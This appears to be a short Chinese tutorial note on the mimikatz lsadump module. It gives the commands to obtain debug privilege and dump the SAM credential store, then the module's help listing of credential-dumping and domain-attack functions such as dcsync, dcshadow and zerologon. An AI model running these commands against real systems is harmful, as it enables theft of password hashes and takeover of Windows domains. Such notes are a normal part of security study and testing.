概述:mimikatz 项目使用及解析 lsadump命令帮助1234567891011121314151617181920212223242526272829# 提权privilege::debug# 读取samlsadump::sam# 查看帮助手册mimikatz # lsadump::ERROR mimikatz_doLocal ; "(null)" command of "lsadump" module not found !Module : lsadumpFull name : LsaDump module sam - Get the SysKey to decrypt SAM entries (from registry or hives) secrets - Get the SysKey to decrypt SECRETS entries (from registry or hives) cache - Get the SysKey to decrypt NL$KM then MSCache(v2) (from registry or hives) lsa - Ask LSA Server to retrieve SAM/AD entries (normal, patch on the fly or inject) trust - Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly) backupkeys rpdata dcsync - Ask a DC to synchronize an object dcshadow - They told me I could be anything I wanted, so I became a domain controller setntlm - Ask a server to set a new password/ntlm for one user changentlm - Ask a server to set a new password/ntlm for one user netsync - Ask a DC to send current and previous NTLM hash of DC/SRV/WKS packages mbc zerologon postzerologon